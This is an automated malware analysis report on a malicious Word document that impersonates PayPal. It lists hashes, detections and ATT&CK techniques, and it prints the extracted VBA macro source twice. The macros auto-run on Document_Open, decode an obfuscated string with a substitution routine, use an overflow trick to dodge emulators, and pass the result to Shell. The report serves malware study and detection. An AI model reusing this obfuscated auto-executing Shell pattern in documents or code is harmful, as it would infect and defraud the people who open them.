Office (OLE) malware analysis — malicious · 8009e3c9f430ae71

MALICIOUS

Office (OLE)

45.0 KB Created: 2018-09-18 13:33:00 Authoring application: Microsoft Office Word First seen: 2019-05-16

MD5: 0f0d63d34a0356752f7bb2aa5714487d SHA-1: d25ade3175a349fbd505710dd2048cf5280fd491 SHA-256: 8009e3c9f430ae710bef89f6e645050ced2d24cea0bfa9ef16bb80e4d95b8ce3

182 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1204.002 Malicious File

The sample contains VBA macros, including a Document_Open macro that utilizes the Shell() function, indicating malicious intent. The document body impersonates PayPal, requesting sensitive personal information under the guise of account verification. The Shell() call likely executes a payload to download further malware or exfiltrate collected data.

Heuristics 5

ClamAV: Doc.Malware.Nastjencro-6688356-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Malware.Nastjencro-6688356-0
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3211 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	3211 bytes
SHA-256: `daad79e59b589133c14bbd911235bb775f79e08ee306027cf4228b6c197276b1`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_Open() fp = fpUnDecorateSymbolName("fp") End Sub Attribute VB_Name = "filesettings" Attribute VB_Base = "0{31EFCE23-E780-460F-95A1-ED5DFA41ED7B}{44F18F45-4331-4E26-A352-C92C958B8E18}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Private Sub EXIT_SUCCESS_Change() size_t = filesettings.EXIT_SUCCESS counter = 100 counter = 99 counter = 98 counter = 97 counter = 96 counter = 95 counter = 94 counter = 93 counter = 92 counter = 91 counter = 90 counter = 89 counter = 88 counter = 87 counter = 86 counter = 85 counter = 84 counter = 83 counter = 82 counter = 81 counter = 80 counter = 79 counter = 78 counter = 0 Shell size_t, 0 End Sub Private Sub tool_Change() alignment End Sub Attribute VB_Name = "ending" Function alignment() filesettings.basedefs = bStackBelowHeap("m(j4)m4fdyuihzuvv4[]fdyuihzuvv4[[ka'mosd'4gilm$}hois'l.4,hoi'mfp{\$'uy:d""xumo4hphou(-'uo-yu""mvsu'o{-jdy'vdgjksvu$,hoi'mfp%]] o(f _ttttttttt1ttttt1tttttt1ttttttt08-unu]]{\|hogio:fidmuhh4]] o(f _ttttttttt1ttttt1tttttt1ttttttt08-unu]]\|;oip\gilm$]]zoof3))5w9-66w-676-587)(uy(uy-(kj]]{;mgomz\gilm$]]zoof3))5w9-59e-57r-686)(uy(uy-(kj]]{;][[424dao:ksvu4:u'mdjs'l4ghmss4:ksvufgoz4 o(f _zg'jvui-""go\|4hogio:fidmuhh4] o(f _zg'jvui-""go]4:ys'jdyhopvu4zsjju'[") df = 1 On Error Resume Next df = CInt("2E+10000") If df = 1 Then filesettings.EXIT_SUCCESS = filesettings.basedefs End If End Function Attribute VB_Name = "getErrorMessages" Function bStackBelowHeap(convert) interrupt = "" received = 1 print1 received, interrupt, convert bStackBelowHeap = interrupt End Function Function print1(ByRef loadDbgHelp, ByRef condition, ignored) SIGTERM = Len(ignored) If loadDbgHelp <= SIGTERM Then condition = condition + ULONG_PTR(using(Right(Left(ignored, loadDbgHelp), 1)), 4) loadDbgHelp = loadDbgHelp + 1 print1 loadDbgHelp, condition, ignored End If End Function Function ULONG_PTR(p, info) If p - info < 1 Then ULONG_PTR = Right(Left(filesettings.argc, Len(filesettings.argc) + p - info), 1) Else ULONG_PTR = Right(Left(filesettings.argc, p - info), 1) End If End Function Function using(callstackArray) SIGILL = 1 totalfilesize = 1 SIGSYS SIGILL, totalfilesize, callstackArray using = totalfilesize End Function Function SIGSYS(ByRef SIGILL, ByRef totalfilesize, callstackArray) detected = filesettings.argc SIGTERM = Len(detected) If SIGILL < SIGTERM Then If callstackArray <> Right(Left(detected, SIGILL), 1) Then SIGILL = SIGILL + 1 SIGSYS SIGILL, totalfilesize, callstackArray Else totalfilesize = SIGILL End If End If End Function Attribute VB_Name = "handlers" Function fpUnDecorateSymbolName(Hardware) filesettings.tool = Hardware End Function

SHA-256: daad79e59b589133c14bbd911235bb775f79e08ee306027cf4228b6c197276b1

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
fp = fpUnDecorateSymbolName("fp")
End Sub

Attribute VB_Name = "filesettings"
Attribute VB_Base = "0{31EFCE23-E780-460F-95A1-ED5DFA41ED7B}{44F18F45-4331-4E26-A352-C92C958B8E18}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Sub EXIT_SUCCESS_Change()
size_t = filesettings.EXIT_SUCCESS
counter = 100
counter = 99
counter = 98
counter = 97
counter = 96
counter = 95
counter = 94
counter = 93
counter = 92
counter = 91
counter = 90
counter = 89
counter = 88
counter = 87
counter = 86
counter = 85
counter = 84
counter = 83
counter = 82
counter = 81
counter = 80
counter = 79
counter = 78
counter = 0
Shell size_t, 0
End Sub

Private Sub tool_Change()
alignment
End Sub

Attribute VB_Name = "ending"
Function alignment()
filesettings.basedefs = bStackBelowHeap("m(j4)m4fdyuihzuvv4[]fdyuihzuvv4[[ka'mosd'4gilm$}hois'l.4,hoi'mfp{\$'uy:d""xumo4hphou(-'uo-yu""mvsu'o{-jdy'vdgjksvu$,hoi'mfp%]] o(f _ttttttttt1ttttt1tttttt1ttttttt08-unu]]{|hogio:fidmuhh4]] o(f _ttttttttt1ttttt1tttttt1ttttttt08-unu]]|;oip\gilm$]]zoof3))5w9-66w-676-587)(uy(uy-(kj]]{;mgomz\gilm$]]zoof3))5w9-59e-57r-686)(uy(uy-(kj]]{;][[424dao:ksvu4:u'mdjs'l4ghmss4:ksvufgoz4 o(f _zg'jvui-""go|4hogio:fidmuhh4] o(f _zg'jvui-""go]4:ys'jdyhopvu4zsjju'[")
df = 1
On Error Resume Next
df = CInt("2E+10000")
If df = 1 Then
filesettings.EXIT_SUCCESS = filesettings.basedefs
End If
End Function

Attribute VB_Name = "getErrorMessages"
Function bStackBelowHeap(convert)
interrupt = ""
received = 1
print1 received, interrupt, convert
bStackBelowHeap = interrupt
End Function

Function print1(ByRef loadDbgHelp, ByRef condition, ignored)
SIGTERM = Len(ignored)
If loadDbgHelp <= SIGTERM Then
condition = condition + ULONG_PTR(using(Right(Left(ignored, loadDbgHelp), 1)), 4)
loadDbgHelp = loadDbgHelp + 1
print1 loadDbgHelp, condition, ignored
End If
End Function

Function ULONG_PTR(p, info)
If p - info < 1 Then
ULONG_PTR = Right(Left(filesettings.argc, Len(filesettings.argc) + p - info), 1)
Else
ULONG_PTR = Right(Left(filesettings.argc, p - info), 1)
End If
End Function

Function using(callstackArray)
SIGILL = 1
totalfilesize = 1
SIGSYS SIGILL, totalfilesize, callstackArray
using = totalfilesize
End Function
  
Function SIGSYS(ByRef SIGILL, ByRef totalfilesize, callstackArray)
detected = filesettings.argc
SIGTERM = Len(detected)
If SIGILL < SIGTERM Then
    If callstackArray <> Right(Left(detected, SIGILL), 1) Then
    SIGILL = SIGILL + 1
    SIGSYS SIGILL, totalfilesize, callstackArray
    Else
    totalfilesize = SIGILL
    End If
End If
End Function

Attribute VB_Name = "handlers"
Function fpUnDecorateSymbolName(Hardware)
filesettings.tool = Hardware
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.